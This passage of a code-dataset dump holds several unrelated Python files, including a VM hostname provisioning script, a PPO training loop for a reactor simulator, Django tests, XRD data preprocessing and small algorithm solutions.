))\n","sub_path":"kochira/services/web/lastfm.py","file_name":"lastfm.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42066458","text":"_world = {}\nstarting_position = (0, 0)\n\n\ndef load_map_tiles():\n \"\"\"\n Parse a file describing the world space into the _world dictionary.\n (x, y) tuple is used as a dictionary key, and the tile name serves\n as the value.\n \"\"\"\n with open('resources/map.txt', 'r') as file:\n rows = file.readlines()\n\n # Set the row length.\n x_max = len(rows[0].split(','))\n\n for y in range(len(rows)):\n columns = rows[y].split(',')\n for x in range(x_max):\n # Replace newline at the end of the tile name.\n tile_name = columns[x].replace('\\n', '')\n if tile_name == 'StartingRoom':\n global starting_position\n starting_position = (x, y)\n if tile_name == '':\n _world[(x, y)] = None\n else:\n _world[(x, y)] = getattr(__import__('map'), tile_name)(x, y)\n\n\ndef tile_exists(x, y):\n return _world.get((x, y))\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336588954","text":"class Solution:\r\n def grayCode(self, n: 'int') -> 'List[int]':\r\n if not n:\r\n return [0]\r\n \r\n else:\r\n pre = self.grayCode(n-1)\r\n post = [x + 2**(n-1) for x in pre[::-1]]\r\n return pre + post\r\n\r\ns = Solution()\r\nn = 5\r\nprint(s.grayCode(n))","sub_path":"leetcode/python/grayCode.py","file_name":"grayCode.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"151358884","text":"import os\nimport pymongo\nimport re, uuid\nimport time\nimport subprocess\nfrom subprocess import Popen, PIPE\n\n\nclass GetDataFromMongo(object):\n def __init__(self, host=\"173.37.49.29\"):\n self.host = host\n\n def getvminfo(self, vmmacc):\n try:\n client = pymongo.MongoClient(\"mongodb://{0}:2701/\".format(self.host), connectTimeoutMS=60000)\n mydb = client[\"vmdb\"]\n mycoll = mydb[\"vminfo\"]\n mydict = {\"vmmacc\": vmmacc}\n vmname = mycoll.find_one(mydict).get(\"vmname\")\n server_type = mycoll.find_one(mydict).get(\"servertype\")\n return vmname, server_type\n except Exception as e:\n print(\"Error is %s\" % e)\n\n def getipinfo(self, ipaddr):\n try:\n client = pymongo.MongoClient(\"mongodb://{0}:2701/\".format(self.host), connectTimeoutMS=60000)\n mydb = client[\"ipmgr\"]\n mycoll = mydb[\"ippool\"]\n mydict = {\"ipaddr\": ipaddr}\n ret = mycoll.find_one(mydict)\n return ret.get('netmask'), ret.get('gateway'), ret.get('vlanid')\n except Exception as e:\n print(\"Error is %s\" % e)\n\n\ndef isipalive():\n p = subprocess.Popen(\"nslookup qa.webex.com\", stdin=PIPE, stdout=PIPE, shell=True)\n ret = p.stdout.readline()\n try:\n ret = re.match('Server', ret).group()\n return True\n except Exception as e:\n return False\n\n\ngdfm = GetDataFromMongo()\n\ntimeout = 0\nwhile timeout <= 30:\n if isipalive():\n print(\"IP is Alive\")\n break\n else:\n time.sleep(3)\n timeout += 3\n\n\nif not os.path.exists(r\"/vmconfig/.changedhostname\"):\n time.sleep(5)\n vmmacc = ':'.join(re.findall('..', '%012x' % uuid.getnode()))\n print(\"vmmacc is \", vmmacc)\n try:\n vmname, server_type = gdfm.getvminfo(vmmacc)\n except Exception as e:\n print(\"Didn't get vmname from Cassandra vmdb.\")\n print(\"vmname is %s, server type is %s\" % (vmname, server_type))\n hostname, ipaddr = vmname.split('-', 1)\n ipaddr = re.sub('-ct76', '', ipaddr)\n try:\n netmask, gateway, vlanid = gdfm.getipinfo(ipaddr.split('-', 1)[0])\n except Exception as e:\n print(\"Didn't get ipaddr from Cassandra ipmgr db.\")\n cmd = \"sh /vmconfig/vmconfig.sh {0} {1} {2} {3} {4} > /vmconfig/vmconfig.log 2>&1\".format(hostname, ipaddr, netmask,\n gateway, server_type)\n\n if hostname and ipaddr:\n print(cmd)\n os.system(cmd)\n with open(r\"/vmconfig/.changedhostname\", 'w+') as f:\n f.write(\"Changed hostname {0} macc {1} done!\".format(hostname, vmmacc))\n os.system(\"sed -i 's/^python/#python/g' /etc/rc.d/rc.local\")\n os.system(\"sed -i 's/^sh/#sh/g' /etc/rc.d/rc.local\")\n os.system(\"reboot\")\n","sub_path":"vmda/changehostname.py","file_name":"changehostname.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479136776","text":"import random as ran\nimport matplotlib.pylab as plt\nfrom torch import multiprocessing as mp\n\nfrom CNS_UDP_FAST import CNS\nfrom AB_PPO.V4_3_Net_Model_Torch import *\n\nimport copy\nfrom collections import deque\n\n\nclass Work_info: # 데이터 저장 및 초기 입력 변수 선정\n def __init__(self):\n self.CURNET_COM_IP = '192.168.0.10'\n self.CNS_IP_LIST = ['192.168.0.9', '192.168.0.7', '192.168.0.4']\n self.CNS_PORT_LIST = [7100, 7200, 7300]\n self.CNS_NUMBERS = [5, 0, 0]\n\n self.TimeLeg = 10\n\n # TO CNS_UDP_FASE.py\n self.UpdateIterval = 5\n\n def WInfoWarp(self):\n Info = {\n 'Iter': 0\n }\n print('초기 Info Share mem로 선언')\n return Info\n\n\nclass Agent(mp.Process):\n def __init__(self, GlobalNet, MEM, CNS_ip, CNS_port, Remote_ip, Remote_port):\n mp.Process.__init__(self)\n # Network info\n self.GlobalNet = GlobalNet\n self.LocalNet = NETBOX()\n for _ in range(0, self.LocalNet.NubNET):\n self.LocalNet.NET[_].load_state_dict(self.GlobalNet.NET[_].state_dict())\n self.LocalOPT = NETOPTBOX(NubNET=self.LocalNet.NubNET, NET=self.GlobalNet.NET)\n # CNS\n self.CNS = CNS(self.name, CNS_ip, CNS_port, Remote_ip, Remote_port)\n # SharedMem\n self.mem = MEM\n self.LocalMem = copy.deepcopy(self.mem)\n # Work info\n self.W = Work_info()\n # GP Setting\n self.fig_dict = {i_: plt.figure(figsize=(13, 13)) for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]}\n self.ax_dict = {i_: self.fig_dict[i_].add_subplot() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]}\n print(f'Make -- {self}')\n\n # ==============================================================================================================\n # 제어 신호 보내는 파트\n def send_action_append(self, pa, va):\n for _ in range(len(pa)):\n self.para.append(pa[_])\n self.val.append(va[_])\n\n def send_action(self, act):\n # 전송될 변수와 값 저장하는 리스트\n self.para = []\n self.val = []\n\n # 최종 파라메터 전송\n self.CNS._send_control_signal(self.para, self.val)\n #\n # ==============================================================================================================\n # 입력 출력 값 생성\n def InitialStateSet(self):\n self.PhyPara = ['ZINST58', 'ZINST63', 'ZVCT']\n self.PhyState = {_: deque(maxlen=self.W.TimeLeg) for _ in self.PhyPara}\n\n self.COMPPara = ['BFV122', 'BPV145']\n self.COMPState = {_: deque(maxlen=self.W.TimeLeg) for _ in self.COMPPara}\n\n def MakeStateSet(self):\n # 값을 쌓음 (return Dict)\n [self.PhyState[_].append(self.PreProcessing(_, self.CNS.mem[_]['Val'])) for _ in self.PhyPara]\n [self.COMPState[_].append(self.PreProcessing(_, self.CNS.mem[_]['Val'])) for _ in self.COMPPara]\n\n # Tensor로 전환\n self.S_Py = torch.tensor([self.PhyState[key] for key in self.PhyPara])\n self.S_Py = self.S_Py.reshape(1, self.S_Py.shape[0], self.S_Py.shape[1])\n self.S_Comp = torch.tensor([self.COMPState[key] for key in self.COMPPara])\n self.S_Comp = self.S_Comp.reshape(1, self.S_Comp.shape[0], self.S_Comp.shape[1])\n\n # Old 1개 리스트\n self.S_ONE_Py = [self.PhyState[key][-1] for key in self.PhyPara]\n self.S_ONE_Comp = [self.COMPState[key][-1] for key in self.COMPPara]\n\n def PreProcessing(self, para, val):\n if para == 'ZINST58': val = round(val/1000, 6) # 가압기 압력\n if para == 'ZINST63': val = round(val/100, 6) # 가압기 수위\n if para == 'ZVCT': val = round(val/100, 5) # VCT 수위\n return val\n\n # ==============================================================================================================\n\n def run(self):\n while True:\n size, maltime = ran.randint(100, 600), ran.randint(30, 100) * 5\n self.CNS.reset(initial_nub=1, mal=True, mal_case=36, mal_opt=size, mal_time=maltime)\n print(f'DONE initial {size}, {maltime}')\n\n # Get iter\n self.CurrentIter = self.mem['Iter']\n self.mem['Iter'] += 1\n # 진단 모듈 Tester !\n if self.CurrentIter != 0 and self.CurrentIter % 15 == 0:\n print(self.CurrentIter, 'Yes Test')\n self.PrognosticMode = True\n else:\n print(self.CurrentIter, 'No Test')\n self.PrognosticMode = False\n\n # Initial\n done = False\n self.InitialStateSet()\n\n # GP 이전 데이터 Clear\n [self.ax_dict[i_].clear() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n\n while not done:\n fulltime = 15\n t_max = 5 # total iteration = fulltime * t_max\n tun = [1000, 100, 100, 1, 1]\n ro = [1, 1, 1, 2, 2]\n ProgRecodBox = {\"ZINST58\": [], \"ZINST63\": [], \"ZVCT\": [], \"BFV122\": [], \"BPV145\": []} # recode 초기화\n if self.PrognosticMode:\n # Test Mode\n for t in range(self.W.TimeLeg):\n self.CNS.run_freeze_CNS()\n self.MakeStateSet()\n [ProgRecodBox[i_].append(round(self.CNS.mem[i_]['Val'], r_)/t_) for i_, t_, r_ in zip(ProgRecodBox.keys(), tun, ro)]\n\n for __ in range(fulltime*t_max): # total iteration\n if __ != 0 and __ % 10 == 0: # 10Step 마다 예지\n # copy self.S_Py, self.S_Comp\n copySPy, copySComp = self.S_Py, self.S_Comp\n copyRecodBox = {\"ZINST58\": [], \"ZINST63\": [], \"ZVCT\": [], \"BFV122\": [], \"BPV145\": []} # recode 초기화\n # TOOL.ALLP(copyRecodBox[\"ZINST58\"], \"CopySPy\")\n for PredictTime in range(__, fulltime*t_max): # 시간이 갈수록 예지하는 시간이 줄어듬.\n # 예지 시작\n save_ragular_para = {_: 0 for _ in range(self.LocalNet.NubNET)}\n for nubNet in range(0, self.LocalNet.NubNET):\n NetOut = self.LocalNet.NET[nubNet].GetPredictActorOut(x_py=copySPy, x_comp=copySComp)\n NetOut = NetOut.view(-1) # (1, 2) -> (2, )\n act_ = NetOut.argmax().item() # 행열에서 최대값을 추출 후 값 반환\n if nubNet < 4:\n save_ragular_para[nubNet] = (act_ - 10)/10 # act_ 값이 값의 증감으로 변경\n else:\n save_ragular_para[nubNet] = (act_ - 100)/100 # act_ 값이 값의 증감으로 변경\n # TOOL.ALLP(save_ragular_para, \"PARA\")\n\n # copySPy, copySComp에 값 추가\n # copySpy\n copySPyLastVal = copySPy[:, :, -1:] # [1, 3, 10] -> [1, 3, 1] 마지막 변수 가져옴.\n copySPyLastVal = copySPyLastVal + tensor([[\n [save_ragular_para[0]/1000], [save_ragular_para[1]/100], [save_ragular_para[2]/100]\n ]]) # 마지막 변수에 예측된 값을 더해줌.\n copySPy = torch.cat((copySPy, copySPyLastVal), dim=2) # 본래 텐서에 값을 더함.\n copySPy = copySPy[:, :, 1:] # 맨뒤의 값을 자름.\n # copySComp\n copySCompLastVal = copySComp[:, :, -1:] # [1, 3, 10] -> [1, 3, 1] 마지막 변수 가져옴.\n # copySpy와 다르게 copy SComp는 이전의 제어 값을 그대로 사용함.\n\n # copySCompLastVal = copySCompLastVal + tensor([[\n # [save_ragular_para[3]], [save_ragular_para[4]],\n # ]]) # 마지막 변수에 예측된 값을 더해줌.\n\n #TODO\n # 자기자신 자체\n copySCompLastVal = tensor([[[save_ragular_para[3]], [save_ragular_para[4]]]])\n\n copySComp = torch.cat((copySComp, copySCompLastVal), dim=2) # 본래 텐서에 값을 더함.\n copySComp = copySComp[:, :, 1:] # 맨뒤의 값을 자름.\n # 결과값 Recode\n copyRecodBox[\"ZINST58\"].append(copySPyLastVal[0, 0, 0].item())\n copyRecodBox[\"ZINST63\"].append(copySPyLastVal[0, 1, 0].item())\n copyRecodBox[\"ZVCT\"].append(copySPyLastVal[0, 2, 0].item())\n\n copyRecodBox[\"BFV122\"].append(copySComp[0, 0, 0].item())\n copyRecodBox[\"BPV145\"].append(copySComp[0, 1, 0].item())\n # 예지 종료 결과값 Recode 그래픽화\n [self.ax_dict[i_].plot(ProgRecodBox[i_] + copyRecodBox[i_],\n label=f\"{i_}_{__}\") for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n\n # plt.show()\n # CNS + 1 Step\n self.CNS.run_freeze_CNS()\n self.MakeStateSet()\n [ProgRecodBox[i_].append(round(self.CNS.mem[i_]['Val'], r_)/t_) for i_, t_, r_ in zip(ProgRecodBox.keys(), tun, ro)]\n\n # END Test Mode CODE\n [self.ax_dict[i_].grid() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n [self.ax_dict[i_].legend() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n [self.fig_dict[i_].savefig(f\"{self.CurrentIter}_{i_}.png\") for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n print('END TEST')\n\n else:\n # Train Mode\n for t in range(self.W.TimeLeg):\n self.CNS.run_freeze_CNS()\n self.MakeStateSet()\n\n for __ in range(fulltime):\n spy_lst, scomp_lst, a_lst, r_lst = [], [], [], []\n a_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n mu_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n\n a_now = {_: 0 for _ in range(self.LocalNet.NubNET)}\n a_prob = {_: [] for _ in range(self.LocalNet.NubNET)}\n r_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n done_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n #\n trag_mu = {_: [] for _ in range(self.LocalNet.NubNET)}\n # Sampling\n for t in range(t_max):\n NetOut_dict = {_: 0 for _ in range(self.LocalNet.NubNET)}\n for nubNet in [0, 2]:\n TOOL.ALLP(self.S_Py, 'S_Py')\n TOOL.ALLP(self.S_Comp, 'S_Comp')\n # TODO\n # Network는 0, 2은 actor net\n mu_v = self.LocalNet.NET[nubNet].GetPredictActorOut(x_py=self.S_Py, x_comp=self.S_Comp)\n mu = mu_v.data.numpy() # detach 이후 numpy로 반환\n TOOL.ALLP(mu, \"Mu\")\n # Action 선택\n logstd = self.LocalNet.NET[nubNet].logstd.data.numpy()\n act = mu + np.exp(logstd) * np.random.normal(size=logstd.shape)\n act = np.clip(act, 0, 1)\n TOOL.ALLP(act, \"ACT\") # (1, 3) 또는 (1, 2)\n # 액션 및 mu 저장\n a_dict[nubNet].append(act)\n mu_dict[nubNet].append(mu)\n NetOut_dict[nubNet] = act[0] # 현재 상태의 action DIS (3,) 또는 (2,)\n\n # 상태 저장\n spy_lst.append(self.S_Py.tolist()[0]) # (1, 2, 10) -list> (2, 10)\n scomp_lst.append(self.S_Comp.tolist()[0]) # (1, 2, 10) -list> (2, 10)\n\n # old val to compare the new val\n ComparedPara = [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]\n ComparedParaRound = [1, 1, 1, 2, 2]\n self.old_cns = {para: round(self.CNS.mem[para]['Val'], pr) for para, pr in zip(ComparedPara,ComparedParaRound)}\n\n # CNS + 1 Step\n self.CNS.run_freeze_CNS()\n self.MakeStateSet()\n self.new_cns = {para: round(self.CNS.mem[para]['Val'], pr) for para, pr in zip(ComparedPara,ComparedParaRound)}\n\n # 보상 및 종료조건 계산\n r = {0: 0, 1: 0, 2: 0, 3: 0}\n pa = {0: 0, 1: 0, 2: 0, 3: 0}\n\n for nubNet in range(0, self.LocalNet.NubNET): # 보상 네트워크별로 계산 및 저장\n if nubNet == 0 or nubNet == 1:\n # TODO\n # 여기서 부터 작업해야함.\n r[nubNet] = 1\n elif nubNet == 2 or nubNet == 3:\n pass\n r_dict[nubNet].append(r[nubNet])\n\n # 종료 조건 계산\n if __ == 14 and t == t_max-1:\n done_dict[nubNet].append(0)\n done = True\n else:\n done_dict[nubNet].append(1)\n\n def dp_want_val(val, name):\n return f\"{name}: {self.CNS.mem[val]['Val']:4.4f}\"\n\n print(self.CurrentIter, f\"{r[0]:4}|{r[1]:4}|{r[2]:4}|{r[3]:4}|{r[4]:6}|{r[5]:6}|\",\n f'{NetOut_dict[0]:0.4f}', f'{NetOut_dict[1]:0.4f}',\n f'{NetOut_dict[2]:0.4f}', f'{NetOut_dict[3]:0.4f}',\n f'{NetOut_dict[4]:0.4f}', f'{NetOut_dict[5]:0.4f}',\n f\"TIME: {self.CNS.mem['KCNTOMS']['Val']:5}\",\n # dp_want_val('PVCT', 'VCT pressure'),\n f\"VCT Level: {self.new_cns['ZVCT']}\",\n f\"{self.old_cns['ZVCT'] + pa[1]:5.2f} + {pa[1]:5.2f}\",\n f\"PZR pre: {self.new_cns['ZINST58']}\",\n f\"{self.old_cns['ZINST58'] + pa[2]:5.2f} + {pa[2]:5.2f}\",\n f\"PZR Level: {self.new_cns['ZINST63']}\",\n f\"{self.old_cns['ZINST63'] + pa[3]:5.2f} + {pa[3]:5.2f}\",\n f\"BFV122: {self.new_cns['BFV122']}\",\n f\"{self.new_cns['BFV122'] + pa[4]:5.2f} + {pa[4]:5.2f}\",\n f\"BFV122: {self.new_cns['BPV145']}\",\n f\"{self.new_cns['BPV145'] + pa[5]:5.2f} + {pa[5]:5.2f}\",\n # dp_want_val('UPRT', 'PRT temp'), dp_want_val('ZINST48', 'PRT pressure'),\n # dp_want_val('ZINST36', 'Let-down flow'), dp_want_val('BFV122', 'Charging Valve pos'),\n # dp_want_val('BPV145', 'Let-down Valve pos'),\n )\n\n # ==================================================================================================\n # Train\n\n gamma = 0.98\n lmbda = 0.95\n\n # 1 .. 10\n spy_batch = torch.tensor(spy_lst, dtype=torch.float)\n scomp_batch = torch.tensor(scomp_lst, dtype=torch.float)\n # 2 .. 10 + (1 Last value)\n spy_lst.append(self.S_Py.tolist()[0])\n scomp_lst.append(self.S_Comp.tolist()[0])\n spy_fin = torch.tensor(spy_lst[1:], dtype=torch.float)\n scomp_fin = torch.tensor(scomp_lst[1:], dtype=torch.float)\n\n # 각 네트워크 별 Advantage 계산\n for nubNet in range(0, self.LocalNet.NubNET):\n # GAE\n # r_dict[nubNet]: (5,) -> (5,1)\n # Netout : (5,1)\n # done_dict[nubNet]: (5,) -> (5,1)\n td_target = torch.tensor(r_dict[nubNet], dtype=torch.float).view(t_max, 1) + \\\n gamma * self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_fin, scomp_fin) * \\\n torch.tensor(done_dict[nubNet], dtype=torch.float).view(t_max, 1)\n delta = td_target - self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_batch, scomp_batch)\n delta = delta.detach().numpy()\n\n adv_list = []\n adv_ = 0.0\n for reward in delta[::-1]:\n adv_ = gamma * adv_ * lmbda + reward[0]\n adv_list.append([adv_])\n adv_list.reverse()\n adv = torch.tensor(adv_list, dtype=torch.float)\n\n PreVal = self.LocalNet.NET[nubNet].GetPredictActorOut(spy_batch, scomp_batch)\n PreVal = PreVal.gather(1, torch.tensor(a_dict[nubNet])) # PreVal_a\n # TOOL.ALLP(PreVal, f\"Preval {nubNet}\")\n\n # Ratio 계산 a/b == exp(log(a) - log(b))\n # TOOL.ALLP(a_prob[nubNet], f\"a_prob {nubNet}\")\n Preval_old_a_prob = torch.tensor(a_prob[nubNet], dtype=torch.float)\n ratio = torch.exp(torch.log(PreVal) - torch.log(Preval_old_a_prob))\n # TOOL.ALLP(ratio, f\"ratio {nubNet}\")\n\n # surr1, 2\n eps_clip = 0.1\n surr1 = ratio * adv\n surr2 = torch.clamp(ratio, 1 - eps_clip, 1 + eps_clip) * adv\n\n min_val = torch.min(surr1, surr2)\n smooth_l1_loss = nn.functional.smooth_l1_loss(self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_batch, scomp_batch), td_target.detach())\n\n loss = - min_val + smooth_l1_loss\n\n self.LocalOPT.NETOPT[nubNet].zero_grad()\n loss.mean().backward()\n for global_param, local_param in zip(self.GlobalNet.NET[nubNet].parameters(),\n self.LocalNet.NET[nubNet].parameters()):\n global_param._grad = local_param.grad\n self.LocalOPT.NETOPT[nubNet].step()\n self.LocalNet.NET[nubNet].load_state_dict(self.GlobalNet.NET[nubNet].state_dict())\n\n # TOOL.ALLP(advantage.mean())\n # print(self.CurrentIter, 'AgentNub: ', nubNet,\n # 'adv: ', adv.mean().item(), 'loss: ', loss.mean().item(),\n # '= - min_val(', min_val.mean().item(), ') + Smooth(', smooth_l1_loss.mean().item(), ')')\n\n print('DONE EP')\n break\n\n\nif __name__ == '__main__':\n W_info = Work_info()\n GlobalModel = NETBOX()\n [GlobalModel.NET[_].share_memory() for _ in range(0, GlobalModel.NubNET)] # Net 들을 Shared memory 에 선언\n\n # Make shared mem\n MEM = mp.Manager().dict(W_info.WInfoWarp())\n\n workers = []\n for cnsip, com_port, max_iter in zip(W_info.CNS_IP_LIST, W_info.CNS_PORT_LIST, W_info.CNS_NUMBERS):\n if max_iter != 0:\n for i in range(1, max_iter + 1):\n workers.append(Agent(GlobalNet=GlobalModel,\n MEM=MEM,\n CNS_ip=cnsip, CNS_port=com_port + i,\n Remote_ip=W_info.CURNET_COM_IP, Remote_port=com_port + i))\n\n [_.start() for _ in workers]\n [_.join() for _ in workers]","sub_path":"AB_PPO/V4_3_Main.py","file_name":"V4_3_Main.py","file_ext":"py","file_size_in_byte":21340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251528658","text":"\"\"\"All the data models for the Hack Club Secret Santa\"\"\"\nfrom peewee import *\nimport datetime\n\nDB = MySQLDatabase(\"santa\")\n\nclass Base(Model):\n \"\"\"Base PeeWee model to assign the proper metaclass\"\"\"\n class Meta:\n database = DB\n\nclass Address(Base):\n \"\"\"PeeWee model to represent a physical address\"\"\"\n house_number = IntegerField()\n street_name = CharField()\n city = CharField()\n state = CharField()\n country = CharField()\n zip_code = IntegerField()\n \nclass Recipient(Base):\n \"\"\"PeeWee model to represent the recipient/giver of a gift\"\"\"\n registered_at = DateTimeField(default=datetime.datetime.now)\n address = ForeignKeyField(Address, related_name=\"recipient\")\n wish_list = TextField()\n shopping = BooleanField()\n being_shopped_for = BooleanField()","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82403026","text":"import datetime\n\nfrom django.test import TestCase\n\nfrom pdl.models import Proyecto, Seguimientos, Expedientes\nfrom seguimientos import utils\n\n\nclass Object(object):\n \"\"\"Dummy class for testing.\"\"\"\n pass\n\n\nclass TestSeguimientos(TestCase):\n def setUp(self):\n proyecto = Proyecto(**{\n \"numero_proyecto\": \"02764/2013-CR\",\n \"codigo\": \"02764\",\n \"legislatura\": 2011,\n \"short_url\": \"4zhube\",\n \"titulo\": \"Propone Ley Universitaria\",\n \"iniciativas_agrupadas\": ['01790', '01800'],\n \"fecha_presentacion\": \"2010-10-10\",\n \"id\": 1,\n })\n proyecto.save()\n\n seguimiento1 = {\n 'fecha': '2013-10-14',\n 'evento': 'Decretado a... Educación, Juventud y Deporte',\n 'proyecto': proyecto,\n }\n seguimiento2 = {\n 'fecha': '2013-10-15',\n 'evento': 'En comisión Educación, Juventud y Deporte',\n 'proyecto': proyecto,\n }\n b = Seguimientos(**seguimiento1)\n b.save()\n b = Seguimientos(**seguimiento2)\n b.save()\n\n expediente1 = seguimiento1 # Expediente y Seguimiento con casi lo mismo\n expediente2 = seguimiento2 # Expediente y Seguimiento con casi lo mismo\n b = Expedientes(**expediente1)\n b.save()\n b = Expedientes(**expediente2)\n b.save()\n\n def test_get_proyecto_from_short_url(self):\n short_url = \"4zhube\"\n expected = {\n \"numero_proyecto\": \"02764/2013-CR\",\n \"codigo\": \"02764\",\n \"titulo\": \"Propone Ley Universitaria\",\n \"iniciativas_agrupadas\": \"['01790', '01800']\",\n }\n result = utils.get_proyecto_from_short_url(short_url)\n self.assertEqual(expected['codigo'], result.codigo)\n self.assertEqual(expected['iniciativas_agrupadas'],\n result.iniciativas_agrupadas)\n\n def test_get_proyecto_from_short_url_from_string(self):\n proyecto = Proyecto(**{\n \"numero_proyecto\": \"02764/2013-CR\",\n \"codigo\": \"02764\",\n \"short_url\": \"4zhube\",\n \"legislatura\": 2011,\n \"titulo\": \"Propone Ley Universitaria\",\n \"iniciativas_agrupadas\": '{01790,01800}',\n \"fecha_presentacion\": \"2010-10-10\",\n \"time_created\": datetime.date.today(),\n \"id\": 1,\n })\n proyecto.save()\n short_url = \"4zhube\"\n expected = ['01790', '01800']\n result = utils.get_proyecto_from_short_url(short_url)\n self.assertEqual(expected, result.iniciativas_agrupadas)\n\n def test_hiperlink_congre(self):\n congresista = 'Gamarra Saldivar, Teofilo'\n expected = \"Gamarra Saldivar, Teofilo\"\n result = utils.hiperlink_congre(congresista)\n self.assertEqual(expected, result)\n\n def test_convert_name_to_slug(self):\n congresista = \"Gamarra Saldivar, Teofilo\"\n expected = \"gamarra_saldivar_teofilo/\"\n result = utils.convert_name_to_slug(congresista)\n self.assertEqual(expected, result)\n\n def test_get_events_from_expediente(self):\n result = utils.get_events_from_expediente('1')\n expected = '15 Oct, 2013'\n self.assertEqual(expected, result[0].fecha)\n","sub_path":"proyectos_de_ley/seguimientos/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"317076754","text":"import socket\n\nsockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsockfd.bind((\"127.0.0.1\", 22385))\nsockfd.listen(5)\nprint(\"Please Wait....\")\nconnfd, addr = sockfd.accept()\nprint(\"Connect from\", addr) # 打印连接客户端的地址\nsave = open(\"save.jpg\", \"wb\")\n\ncount = 0\nwhile True:\n data = connfd.recv(4096)\n if not data:\n print(\"接收完毕\")\n break\n save.write(data)\n count += 1\n print(\"收到数据:%d\" % count)\n\nn = connfd.send(\"收到,over\".encode()) # 发送字节串\nprint(\"发送%d字节\" % n)\n\nconnfd.close()\nsockfd.close()\n","sub_path":"part_02_system_programming/part_2_2_IO/day6/tcp_flie_recv.py","file_name":"tcp_flie_recv.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149056549","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import TodoListView, TodoDetailView, TodoCreateView, TodoUpdateView, TodoDeleteView\n\napp_name = 'todoclass'\nurlpatterns = [\n path('', TodoListView.as_view(), name='list'),\n path('create/', TodoCreateView.as_view(), name='create'),\n path('/', TodoDetailView.as_view(), name='detail'),\n path('/update/', TodoUpdateView.as_view(), name='update'),\n path('/delete/', TodoDeleteView.as_view(), name='delete'),\n]\n","sub_path":"todoclass/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"24621745","text":"import numpy as np\nfrom scipy import signal\nfrom sklearn import linear_model\n\ndef select_angular_range(angle, angular_range=(26, 30), tol=1e-4):\n min_angle, max_angle = angular_range\n\n id_angle = (angle - min_angle >= -tol) & (angle - max_angle <= tol)\n\n return id_angle\n\ndef trim_angular_range(angle, pattern, angular_range=(26, 30), tol=1e-4):\n\n if angular_range is None:\n return angle, pattern\n\n id_angle = select_angular_range(angle, angular_range=angular_range, tol=tol)\n\n return angle[id_angle], pattern[...,id_angle]\n\ndef detrend_pattern(angle, pattern, support=None, return_bias=False):\n\n reg = linear_model.BayesianRidge()\n\n if support is not None:\n reg.fit(angle[support,None], pattern[support])\n else:\n mean_intensity = np.mean(np.abs(pattern))\n std_intensity = np.std(np.abs(pattern))\n support = np.abs(pattern) < mean_intensity + 2*std_intensity\n\n reg.fit(angle[support,None], pattern[support])\n\n bias = reg.predict(angle[:,None])\n\n if return_bias:\n return pattern - bias, bias\n else:\n return pattern - bias\n\ndef detrend_dataset(angle, X):\n XX = []\n for x in X:\n mean_intensity = np.mean(np.abs(x))\n std_intensity = np.std(np.abs(x))\n support = np.abs(x) < mean_intensity + 2*std_intensity\n pattern, bias = detrend_pattern(angle, x, support=support, return_bias=True)\n XX.append(pattern)\n return np.array(XX)\n\ndef smooth_patterns(patterns, order=2, Wn=0.025, clip=True):\n \"\"\" apply a lowpass filter to suppress noise, with optional clipping to zero \"\"\"\n\n b, a = signal.butter(order, Wn, analog=False)\n XXclip = signal.filtfilt(b, a, patterns, axis=-1)\n\n if clip:\n XXclip = np.clip(XXclip, 0.0, 9999)\n\n return XXclip\n","sub_path":"VNbO2/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"21254528","text":"# O(n) time | O(1) space\n# where n is the length of the array\n#\ndef longestPeak(array):\n longestPeakLength = 0\n i = 1\n\n while i < len(array) - 1:\n isPeak = array[i] > array[i - 1] and array[i] > array[i + 1]\n if isPeak == False:\n i += 1\n continue\n\n # left\n left = i - 2\n while left >= 0 and array[left] < array[left + 1]:\n left -= 1\n\n # right\n right = i + 2\n while right < len(array) and array[right] < array[right - 1]:\n right += 1\n\n currentPeak = right - left - 1\n longestPeakLength = max(currentPeak, longestPeakLength)\n\n i = right\n\n return longestPeakLength\n\nif __name__ == '__main__':\n array = [ 1, 2, 